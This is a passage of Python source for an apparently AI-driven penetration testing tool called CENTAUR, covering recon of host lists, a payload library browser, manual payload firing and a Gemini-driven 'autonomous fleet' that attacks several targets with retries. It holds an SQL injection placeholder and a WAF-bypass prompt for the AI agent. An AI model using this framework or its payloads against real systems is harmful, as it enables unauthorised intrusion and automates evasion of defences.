                "Payload": payload_gen.payload[:60] + "...",
                "Status": "✅ BREACH" if final_result.success else "🔒 Blocked",
                "Evidence": ", ".join(final_result.evidence[:2]) if final_result.evidence else "None",
                "HTTP": final_result.status_code,
                "Attempts": len(iterations),
            }
        except Exception as e:
            exploit_logger.log("ERROR", f"Autonomous failed on {tid}: {e}")
            detailed_logs.append("\n".join(log) + f"\n❌ Error: {str(e)}")
            return failed_row(tid, str(e)[:50])

    results = await asyncio.gather(*[attack_sequence(t) for t in selected[:10]])
    df = pd.DataFrame(results)
    success_count = int((df['Status'] == '✅ BREACH').sum())
    total = len(df)
    summary = f"""## 🚀 Autonomous Fleet Report
**Breaches:** {success_count}/{total} | **Success Rate:** {(success_count/total*100):.1f}%
**Attack Distribution:** {df['Vulnerability'].value_counts().to_dict()}
**Fix Loop Stats:** Avg attempts: {df['Attempts'].mean():.1f}"""
    # Cells hold payload strings and text taken from target responses; they
    # must be escaped so they are displayed as text rather than interpreted as
    # markup in the operator's browser.
    html_table = df.to_html(classes='table', index=False, escape=True)
    return summary, html_table, detailed_logs
# ==============================================================================
# UI HELPER FUNCTIONS
# ==============================================================================
def get_payload_library_df():
    """Flatten PAYLOAD_LIBRARY into a DataFrame with one row per payload.

    Returns:
        A DataFrame built from dicts with the keys ``Type`` (top-level library
        key), ``Category`` (second-level key) and ``Payload``.
    """
    return pd.DataFrame([
        {"Type": kind, "Category": group, "Payload": entry}
        for kind, groups in PAYLOAD_LIBRARY.items()
        for group, entries in groups.items()
        for entry in entries
    ])
def filter_payloads(vuln_type_filter, search_term):
    """Return the payload library filtered by type and by a search term.

    Args:
        vuln_type_filter: Value of the ``Type`` column to keep; a falsy value
            or ``"All"`` keeps every type.
        search_term: Case-insensitive text to look for in the ``Payload``
            column. It is used as a regular expression when it is a valid
            one and as literal text otherwise. A falsy value disables the
            search.

    Returns:
        The filtered DataFrame.
    """
    df = get_payload_library_df()
    if vuln_type_filter and vuln_type_filter != "All":
        df = df[df["Type"] == vuln_type_filter]
    if search_term:
        # Payload fragments such as "(" or "*" are not valid regular
        # expressions; fall back to a literal search instead of raising.
        try:
            re.compile(search_term)
            as_regex = True
        except re.error:
            as_regex = False
        matches = df["Payload"].str.contains(
            search_term, case=False, na=False, regex=as_regex
        )
        df = df[matches]
    return df
def get_db_dataframe(state, ip_filter="", port_filter="", vuln_only=False):
    """Build the target table from the stored profiles, with optional filters.

    Args:
        state: Shared state dict; profiles are read from ``state["profiles"]``
            (a missing key is treated as no profiles). Each profile must
            provide ``to_dict()``.
        ip_filter: Literal, case-insensitive substring that ``target_id`` must
            contain.
        port_filter: Port that ``target_id`` must end with (as ``":<port>"``).
        vuln_only: Keep only rows whose status is "✅ Exploitable".

    Returns:
        A DataFrame of the profile dicts plus a ``Status`` column, or an empty
        DataFrame with the expected columns when there are no profiles.
    """
    profiles = list(state.get("profiles", {}).values())
    if not profiles:
        return pd.DataFrame(columns=["target_id", "protocol", "server", "waf", "cms",
                                     "paths", "errors", "forms", "apis", "tech", "Status"])

    df = pd.DataFrame([p.to_dict() for p in profiles])
    # A target counts as exploitable once any path or error signature was found.
    has_findings = (df["paths"] > 0) | (df["errors"] > 0)
    df["Status"] = has_findings.map({True: "✅ Exploitable", False: "⚪ Limited"})

    if ip_filter:
        # Literal match: as a regex, every "." in an address would match any
        # character and input such as "(" would raise.
        df = df[df["target_id"].str.contains(ip_filter, case=False, na=False, regex=False)]
    if port_filter:
        df = df[df["target_id"].str.endswith(f":{port_filter}", na=False)]
    if vuln_only:
        df = df[df["Status"] == "✅ Exploitable"]
    return df
async def run_recon_bg(files, manual, state):
    """Collect targets from CSV uploads and manual text, scan them, stream progress.

    This is an async generator. Each yielded item is
    ``(state, dropdown_update, checkbox_update, status_text, dataframe)``.

    Args:
        files: Uploaded CSV files (``host,port`` per row) or a falsy value.
        manual: Text with one ``host`` or ``host:port`` per line; blank lines
            and lines starting with ``#`` are ignored.
        state: Shared state dict; ``"profiles"`` and ``"arsenal"`` are reset
            before scanning starts.

    A missing or non-numeric port defaults to 80. Files that cannot be read
    are skipped and the reason is written to the log.
    """
    targets = []
    load_errors = []

    for f in files or []:
        # NOTE(review): depending on the Gradio version an upload may arrive as
        # an object exposing ``.name`` or as a plain path string - accept both.
        path = getattr(f, "name", f)
        try:
            # utf-8-sig also strips the BOM that spreadsheet exports often add.
            with open(path, "r", newline="", encoding="utf-8-sig") as csvf:
                for row in csv.reader(csvf):
                    if not row:
                        continue
                    host = row[0].strip()
                    if not host:
                        continue
                    port_text = row[1].strip() if len(row) > 1 else ""
                    port = int(port_text) if port_text.isdigit() else 80
                    targets.append((host, port))
        except (OSError, UnicodeError, csv.Error, TypeError, ValueError) as e:
            # Still best-effort, but no longer silent: remember why the file
            # was skipped so it can be logged below.
            load_errors.append(f"Could not read target file {path!r}: {e}")

    if manual:
        for line in manual.strip().split('\n'):
            line = line.strip().replace(' ', '')
            if not line or line.startswith('#'):
                continue
            if ':' in line:
                parts = line.split(':')
                host = parts[0]
                port = int(parts[1]) if parts[1].isdigit() else 80
            else:
                host = line
                port = 80
            targets.append((host, port))

    if not targets:
        for message in load_errors:
            exploit_logger.log("ERROR", message)
        yield state, gr.update(choices=[]), gr.update(choices=[]), "❌ No targets provided", pd.DataFrame()
        return

    exploit_logger.clear()
    # Logged after clear() so the messages survive the reset.
    for message in load_errors:
        exploit_logger.log("ERROR", message)
    exploit_logger.log("INFO", f"Starting reconnaissance on {len(targets)} targets")
    state["profiles"] = {}
    state["arsenal"] = defaultdict(list)
    sem = asyncio.Semaphore(MAX_CONCURRENT_RECON)

    async def scan_task(h, p):
        # The semaphore caps the number of scans running at the same time.
        async with sem:
            return await AdvancedReconEngine(ReconProfile(h, p)).run()

    # dict.fromkeys removes duplicates while keeping the order of first
    # appearance, so tasks are created in a deterministic order.
    unique_targets = list(dict.fromkeys(targets))
    tasks = [asyncio.create_task(scan_task(h, p)) for h, p in unique_targets]
    total = len(tasks)
    for i, coro in enumerate(asyncio.as_completed(tasks), 1):
        p = await coro
        state["profiles"][p.target_id] = p
        exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable]
        df = get_db_dataframe(state)
        progress = f"🔍 Scanning: {i}/{total} | Exploitable: {len(exploitable)}"
        yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), progress, df

    final_exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable]
    final_df = get_db_dataframe(state)
    final_msg = f"✅ Recon Complete! Scanned {total}. Found {len(final_exploitable)} exploitable."
    exploit_logger.log("INFO", final_msg)
    yield state, gr.update(choices=final_exploitable), gr.update(choices=final_exploitable), final_msg, final_df
def on_target_select(tid, state):
    """Produce the profile summary, arsenal table and default code for a target.

    Args:
        tid: Selected target id.
        state: Shared state dict with ``"profiles"`` and ``"arsenal"``.

    Returns:
        ``(markdown, arsenal_dataframe, code_template)``. For a missing or
        unknown target the markdown is a prompt to select one and the table is
        empty. The code template is always the "Custom" template.
    """
    history_columns = ["Timestamp", "Method", "Endpoint", "Payload", "Status", "Notes"]

    if not (tid and tid in state["profiles"]):
        return ("Select a target from the dropdown...",
                pd.DataFrame(columns=history_columns),
                PAYLOAD_CODE_TEMPLATES["Custom"])

    p = state["profiles"][tid]
    tech_summary = ', '.join(p.technologies) if p.technologies else 'Unknown'
    # Up to five error signatures as a bullet list, or a placeholder bullet.
    error_bullets = chr(10).join(['- ' + sig for sig in p.error_signatures[:5]]) or '- None'
    context = f"""## 🎯 Target Profile: `{tid}`
**Infrastructure:**
- Protocol: `{p.protocol.upper()}` | Server: `{p.server_banner}` | WAF: `{p.waf_detected}` | CMS: `{p.cms_detected}`
- Technologies: `{tech_summary}`
**Attack Surface:**
- Paths: `{len(p.discovered_paths)}` → {', '.join(p.discovered_paths[:5])}
- APIs: `{len(p.api_endpoints)}` → {', '.join(p.api_endpoints[:5])}
- Forms: `{len(p.forms_found)}` | Errors: `{len(p.error_signatures)}`
- Injectable Params: `{', '.join(p.injectable_params[:8])}`
**Timing Baseline:** `{p.response_time_baseline:.3f}s`
**Error Intelligence:**
{error_bullets}
"""
    history = state["arsenal"].get(tid, [])
    if history:
        table = pd.DataFrame(history)
    else:
        table = pd.DataFrame(columns=history_columns)
    return context, table, PAYLOAD_CODE_TEMPLATES["Custom"]
async def execute_manual_wrap(tid, ep, pl, code, http_method, use_code, state):
    """Fire one operator-supplied payload at the selected target and report it.

    Args:
        tid: Selected target id (key of ``state["profiles"]``).
        ep: Endpoint to send the payload to.
        pl: Payload text from the payload field.
        code: Contents of the code editor.
        http_method: HTTP method to use.
        use_code: When true and ``code`` is non-blank, the code is executed
            and its output replaces ``pl``. If the code fails, the failure is
            logged and ``pl`` is used.
        state: Shared state dict; the attempt is appended to
            ``state["arsenal"][tid]``.

    Returns:
        ``(result_markdown, state, arsenal_dataframe, formatted_logs)``.
    """
    if not tid or tid not in state["profiles"]:
        return "❌ Select a valid target first.", state, pd.DataFrame(), exploit_logger.format_logs()

    p = state["profiles"][tid]
    # Guard against None so the length/slicing below cannot fail.
    actual_payload = pl or ""
    if use_code and code and code.strip():
        derived = execute_code_template(code)
        if derived.startswith("# Code error"):
            # Previously ignored without a trace: the operator asked for the
            # code-derived payload but the payload field was fired instead.
            exploit_logger.log(
                "ERROR",
                f"Code template failed, using payload field instead: {derived[:100]}"
            )
        elif derived:
            actual_payload = derived
            exploit_logger.log("INFO", f"Using code-derived payload: {actual_payload[:80]}")

    exploit_logger.log("INFO", "Manual execution", {
        "target": tid, "method": http_method,
        "endpoint": ep, "payload_len": len(actual_payload)
    })
    result = await advanced_payload_fire(
        p.protocol, p.host, p.port, ep, actual_payload,
        p.response_time_baseline, http_method=http_method
    )
    status_icon = "✅ SUCCESS" if result.success else "🔒 Blocked"
    evidence_str = " | ".join(result.evidence[:3]) if result.evidence else "No evidence"
    result_md = f"""### Execution Result
**Status:** {status_icon} | **HTTP:** {result.status_code} | **Time:** {result.response_time:.2f}s
**Evidence:** {evidence_str}
**Response Snippet:**
```
{result.response_body[:500]}
```
**Extracted Data:**
```
{result.extracted_data[:400] if result.extracted_data else 'None'}
```"""
    # setdefault works for both a defaultdict and a plain dict.
    history = state["arsenal"].setdefault(tid, [])
    history.append({
        "Timestamp": datetime.now().strftime("%H:%M:%S"),
        "Method": http_method,
        "Endpoint": ep,
        "Payload": actual_payload,
        "Code": code,
        "Status": status_icon,
        "Notes": evidence_str,
    })
    return result_md, state, pd.DataFrame(history), exploit_logger.format_logs()
def load_payload_template(template_name):
    """Return the code template stored under ``template_name``.

    Unknown names fall back to the "Custom" template.
    """
    fallback = PAYLOAD_CODE_TEMPLATES["Custom"]
    return PAYLOAD_CODE_TEMPLATES.get(template_name, fallback)
async def patch_code_with_ai(current_code, user_request, tid, state, api_key):
    """Ask the AI to patch the editor code for the selected target.

    Args:
        current_code: Code currently in the editor.
        user_request: Free-text description of the desired change.
        tid: Selected target id (key of ``state["profiles"]``).
        state: Shared state dict with ``"profiles"`` and ``"arsenal"``.
        api_key: Gemini API key.

    Returns:
        ``(code, message)``: the patched code with a markdown summary on
        success, otherwise the unchanged code with an error message.
    """
    if not tid or tid not in state["profiles"]:
        return current_code, "❌ Select a target first"
    # Same guard as the other AI-backed handlers: without a key the request
    # cannot succeed, so report it instead of failing inside the client.
    if not api_key:
        return current_code, "❌ Provide a Gemini API key first"

    p = state["profiles"][tid]
    history = state["arsenal"].get(tid) or []
    last_status = history[-1].get("Status", "N/A") if history else "N/A"
    context = {
        "target": tid,
        "server": p.server_banner,
        "waf": p.waf_detected,
        "last_result": last_status,
    }
    patch = await ai_patch_payload_code(current_code, user_request, context, api_key)
    if patch:
        changes = "\n".join(f"- {c}" for c in patch.changes_made)
        return patch.updated_code, f"**Changes:**\n{changes}\n\n**Explanation:**\n{patch.explanation}"
    return current_code, "❌ Failed to patch code"
# ==============================================================================
# GRADIO UI (GRADIO 6 COMPATIBLE)
# ==============================================================================
# Custom stylesheet passed to gr.Blocks(css=...). The class names are attached
# to components through ``elem_classes`` ("exploit-table", "code-editor").
_CSS = """
.primary-btn { background: linear-gradient(45deg,#ff0080,#ff8c00) !important; }
.exploit-table { font-family: 'Courier New', monospace; font-size: 0.9em; }
.code-editor { font-family: 'Courier New', monospace; font-size: 0.95em; }
"""
with gr.Blocks(css=_CSS, theme=gr.themes.Monochrome()) as demo:
engine_state = gr.State({"profiles": {}, "arsenal": defaultdict(list)})
gr.Markdown("# ⚔️ CENTAUR — Autonomous Penetration Testing Platform")
gr.Markdown("### AI-Powered Web Application Security Assessment Framework (Gemini 2.5 + Fix Loop)")
with gr.Row():
api_key = gr.Textbox(
label="🔑 Gemini API Key", type="password",
placeholder="AIzaSy...", scale=3
)
gr.Markdown(
"Get your key from [Google AI Studio](https://aistudio.google.com/app/apikey)"
)
with gr.Tabs():
# ===== TAB 1: RECONNAISSANCE =====
with gr.Tab("🔍 1. Reconnaissance"):
with gr.Row():
with gr.Column(scale=1):
gr.Markdown("### Target Input")
csv_in = gr.File(label="📁 CSV Upload (host,port)", file_count="multiple")
txt_in = gr.Textbox(
label="✍️ Manual Entry (one per line)",
placeholder="192.168.1.1:80\nexample.com:443\n10.0.0.1",
lines=5
)
recon_btn = gr.Button("🚀 START RECONNAISSANCE", variant="primary", size="lg")
recon_status = gr.Markdown("⚪ System Ready")
with gr.Column(scale=2):
gr.Markdown("### 🗄️ Target Database")
with gr.Row():
f_ip = gr.Textbox(label="🔎 IP/Host Filter", placeholder="192.168", scale=2)
f_port = gr.Textbox(label="Port Filter", placeholder="80", scale=1)
f_v = gr.Checkbox(label="Exploitable Only", scale=1)
db_viewer = gr.Dataframe(interactive=False, wrap=True, elem_classes="exploit-table")
# ===== TAB 2: WAR ROOM =====
# Manual testing workspace made of three scale=1 columns: target selection and
# history, the payload editor, and the AI chat agent.
# NOTE(review): indentation was lost in this copy of the file, so which widgets
# sit inside which Row/Column/Accordion is inferred from order — confirm.
with gr.Tab("⚔️ 2. War Room"):
with gr.Row():
# --- Column 1: active target and its recorded attempts ---
with gr.Column(scale=1):
gr.Markdown("### 🎯 Target Selection")
# Starts with no choices; this dropdown is an output of the recon click
# handler, which presumably fills in the discovered targets.
wr_target = gr.Dropdown(label="Active Target", choices=[], interactive=True)
wr_context = gr.Markdown("*Select a target to view intelligence...*")
gr.Markdown("### 📚 Arsenal History")
# Read-only history table; selecting a row is wired to load that entry
# back into the endpoint/payload/code/method editor fields.
arsenal_table = gr.Dataframe(
headers=["Timestamp","Method","Endpoint","Payload","Status","Notes"],
interactive=False, wrap=True, elem_classes="exploit-table"
)
# --- Column 2: payload editor ---
with gr.Column(scale=1):
gr.Markdown("### 🛠️ Payload Editor")
# Collapsed-by-default browser over PAYLOAD_LIBRARY with type and text filters.
with gr.Accordion("📖 Payload Library", open=False):
with gr.Row():
lib_type = gr.Dropdown(label="Type", choices=["All"] + list(PAYLOAD_LIBRARY.keys()), value="All")
lib_search = gr.Textbox(label="Search", placeholder="SLEEP")
# Initial contents come from get_payload_library_df().
lib_table = gr.Dataframe(value=get_payload_library_df(), interactive=False, wrap=True)
# Collapsed-by-default picker over the PAYLOAD_CODE_TEMPLATES entries.
with gr.Accordion("💻 Code Templates", open=False):
template_select = gr.Dropdown(label="Load Template",
choices=list(PAYLOAD_CODE_TEMPLATES.keys()),
value="Custom")
load_template_btn = gr.Button("Load Template")
# Request definition: HTTP method, endpoint and raw payload.
http_method_sel = gr.Radio(
label="HTTP Method", choices=["GET","POST","PUT","DELETE"],
value="GET"
)
ep_in = gr.Textbox(label="🎯 Endpoint", placeholder="/api/users?id=", value="")
pl_in = gr.Textbox(label="💉 Payload", placeholder="' OR SLEEP(5)--", value="", lines=3)
gr.Markdown("### 📝 Payload Code (Editable & Executable)")
# Code editor pre-filled with the "Custom" template.
code_editor = gr.Code(
label="Python Code", language="python",
value=PAYLOAD_CODE_TEMPLATES["Custom"],
lines=15, elem_classes="code-editor"
)
# Off by default; the flag is forwarded to execute_manual_wrap on fire.
use_code_chk = gr.Checkbox(
label="🔄 Execute code template to derive payload before firing",
value=False
)
with gr.Row():
fire_btn = gr.Button("🔥 EXECUTE PAYLOAD", variant="primary", size="lg")
clear_btn = gr.Button("🧹 Clear", size="lg")
# Result summary and detailed log; both are outputs of the fire_btn handler.
fire_res = gr.Markdown()
with gr.Accordion("📊 Execution Logs", open=False):
log_viewer = gr.Textbox(label="Detailed Logs", lines=10, max_lines=20, interactive=False)
# --- Column 3: conversational AI agent ---
with gr.Column(scale=1):
gr.Markdown("### 🤖 AI Agent — CENTAUR")
# avatar_images is (user, bot): no user avatar, a robot icon for the agent.
chatbot = gr.Chatbot(
height=400, label="Conversational Interface",
show_label=False,
avatar_images=(None, "https://em-content.zobj.net/source/twitter/376/robot_1f916.png")
)
# Free-text instruction; used as an input by both the chat handler and
# the patch-code handler, and cleared after either one runs.
chat_in = gr.Textbox(
label="Operator Instruction",
placeholder="The WAF blocked my SQLi. Help me bypass it with double URL encoding.",
lines=2
)
with gr.Row():
chat_btn = gr.Button("📡 Send to Agent", variant="primary")
patch_code_btn = gr.Button("🔧 Patch Code with AI")
# Second output of the patch-code handler.
patch_result = gr.Markdown()
# ===== TAB 3: AUTONOMOUS FLEET =====
# Batch mode: pick several targets and hand them to run_autonomous_fleet.
# NOTE(review): indentation was lost in this copy of the file; all widgets
# below presumably live directly inside this tab — confirm.
with gr.Tab("🤖 3. Autonomous Fleet"):
# The Markdown literal below spans two source lines; keep them adjacent.
gr.Markdown("""### 🚀 Multi-Target Autonomous Exploitation
Deploy AI agents to: analyse vulnerabilities (with CVE search) → generate strategies (with Metasploit templates) → craft payloads → execute with fix loop (auto-retry up to 3x) → analyse results.""")
# Starts empty; this group is an output of the recon click handler.
# NOTE(review): the "max 10" limit is only stated in the label here —
# verify that run_autonomous_fleet actually enforces it.
fleet_select = gr.CheckboxGroup(label="🎯 Select Targets (max 10)", choices=[])
fleet_deploy = gr.Button("⚡ DEPLOY AUTONOMOUS FLEET", variant="primary", size="lg")
# The three outputs of the fleet_deploy click handler: Markdown, HTML, JSON logs.
fleet_md = gr.Markdown()
fleet_html = gr.HTML()
with gr.Accordion("📜 Detailed Attack Logs", open=False):
fleet_logs = gr.JSON(label="Execution Logs")
# ===== EVENT HANDLERS =====
# Reconnaissance: feed the uploaded CSV files, the manual entries and the
# current engine state to run_recon_bg; its results refresh the state, both
# target pickers, the status line and the database table.
recon_btn.click(
    fn=run_recon_bg,
    inputs=[csv_in, txt_in, engine_state],
    outputs=[engine_state, wr_target, fleet_select, recon_status, db_viewer],
)

# Editing any filter control re-queries the database view with all three
# filter values.
for filter_widget in (f_ip, f_port, f_v):
    filter_widget.change(
        fn=get_db_dataframe,
        inputs=[engine_state, f_ip, f_port, f_v],
        outputs=db_viewer,
    )

# Switching the active target reloads its context panel, arsenal history and
# code editor contents.
wr_target.change(
    fn=on_target_select,
    inputs=[wr_target, engine_state],
    outputs=[wr_context, arsenal_table, code_editor],
)

# Both payload-library controls trigger the same filter over the library
# table; registration order (type first, then search) is kept.
for library_control in (lib_type, lib_search):
    library_control.change(
        fn=filter_payloads,
        inputs=[lib_type, lib_search],
        outputs=lib_table,
    )

# Copy the chosen code template into the editor.
load_template_btn.click(
    fn=load_payload_template,
    inputs=[template_select],
    outputs=code_editor,
)
def _load_arsenal_entry(tid, st, evt: gr.SelectData):
    """Load the clicked arsenal-history row back into the payload editor.

    Gradio only injects selection data into a parameter that is type-hinted
    as ``gr.SelectData``. A lambda cannot carry that annotation, so the
    handler has to be a named function, otherwise ``evt`` is never supplied.

    Args:
        tid: Currently selected target id (value of ``wr_target``).
        st: Engine state dict; ``st["arsenal"]`` maps a target id to a list
            of history entries (dicts).
        evt: Selection event; ``evt.index[0]`` is the clicked row.

    Returns:
        A ``(endpoint, payload, code, method)`` tuple for the editor fields.
        Falls back to ``("", "", "", "GET")`` when the target has no history
        or the row index is out of range.
    """
    blank_editor = ("", "", "", "GET")
    arsenal = st["arsenal"]
    if tid not in arsenal or not evt.index:
        return blank_editor
    row = evt.index[0]
    entries = arsenal[tid]
    if len(entries) <= row:
        return blank_editor
    entry = entries[row]
    return (
        entry.get("Endpoint", ""),
        entry.get("Payload", ""),
        entry.get("Code", "# No code available"),
        entry.get("Method", "GET"),
    )


# Clicking a history row restores that attempt into the editor widgets.
arsenal_table.select(
    _load_arsenal_entry,
    inputs=[wr_target, engine_state],
    outputs=[ep_in, pl_in, code_editor, http_method_sel],
)
def _pick_library_payload(df, evt: gr.SelectData):
    """Return the payload string of the clicked payload-library row.

    The selection event must be received through a parameter type-hinted as
    ``gr.SelectData``. With an un-annotated ``lambda evt, df`` and a single
    input, Gradio binds the table value to ``evt`` and never supplies ``df``.

    Args:
        df: Current value of ``lib_table``; indexed with ``.iloc`` and a
            ``"Payload"`` column.
        evt: Selection event; ``evt.index[0]`` is the clicked row.

    Returns:
        The ``"Payload"`` cell of the selected row, or ``""`` when there is
        no selection index or the row is out of range.
    """
    if not evt.index or len(df) <= evt.index[0]:
        return ""
    return df.iloc[evt.index[0]]["Payload"]


# Clicking a library row copies its payload into the payload textbox.
lib_table.select(
    _pick_library_payload,
    inputs=[lib_table],
    outputs=pl_in,
)
# Fire the request described by the editor fields against the active target.
# The handler's outputs update the result summary, the engine state, the
# arsenal history table and the detailed log box.
fire_btn.click(
    fn=execute_manual_wrap,
    inputs=[
        wr_target,
        ep_in,
        pl_in,
        code_editor,
        http_method_sel,
        use_code_chk,
        engine_state,
    ],
    outputs=[fire_res, engine_state, arsenal_table, log_viewer],
)


def _reset_payload_editor():
    """Return blank endpoint/payload, the "Custom" code template and GET."""
    return "", "", PAYLOAD_CODE_TEMPLATES["Custom"], "GET"


# Clear restores the editor widgets to their initial values.
clear_btn.click(
    fn=_reset_payload_editor,
    outputs=[ep_in, pl_in, code_editor, http_method_sel],
)
# Chat with the agent. Step 1 sends the instruction together with the chat
# history, the active target, the engine state, the editor fields and the API
# key; the handler's outputs update the chat, the editor fields and the state.
_chat_reply_event = chat_btn.click(
    fn=centaur_chat_agent,
    inputs=[
        chat_in,
        chatbot,
        wr_target,
        engine_state,
        ep_in,
        pl_in,
        code_editor,
        http_method_sel,
        api_key,
    ],
    outputs=[chatbot, ep_in, pl_in, code_editor, http_method_sel, engine_state],
)
# Step 2 rebuilds the arsenal table from the (possibly updated) state.
_arsenal_refresh_event = _chat_reply_event.then(
    fn=lambda tid, st: pd.DataFrame(st["arsenal"].get(tid, [])),
    inputs=[wr_target, engine_state],
    outputs=arsenal_table,
)
# Step 3 empties the instruction box.
_arsenal_refresh_event.then(fn=lambda: "", outputs=chat_in)

# Patch the code in the editor using the same instruction box, then empty the
# box once the handler has finished.
_patch_event = patch_code_btn.click(
    fn=patch_code_with_ai,
    inputs=[code_editor, chat_in, wr_target, engine_state, api_key],
    outputs=[code_editor, patch_result],
)
_patch_event.then(fn=lambda: "", outputs=chat_in)
# Deploy button: pass the selected targets, the API key and the engine state
# to run_autonomous_fleet; its three results fill the Markdown summary, the
# HTML report and the JSON log viewer.
fleet_deploy.click(
    fn=run_autonomous_fleet,
    outputs=[fleet_md, fleet_html, fleet_logs],
    inputs=[fleet_select, api_key, engine_state],
)
# Start the Gradio server only when this file is executed as a script.
if __name__ == "__main__":
    demo.launch(
        server_name="0.0.0.0",  # listen on every network interface
        server_port=7860,
        share=False,  # no public share link
    )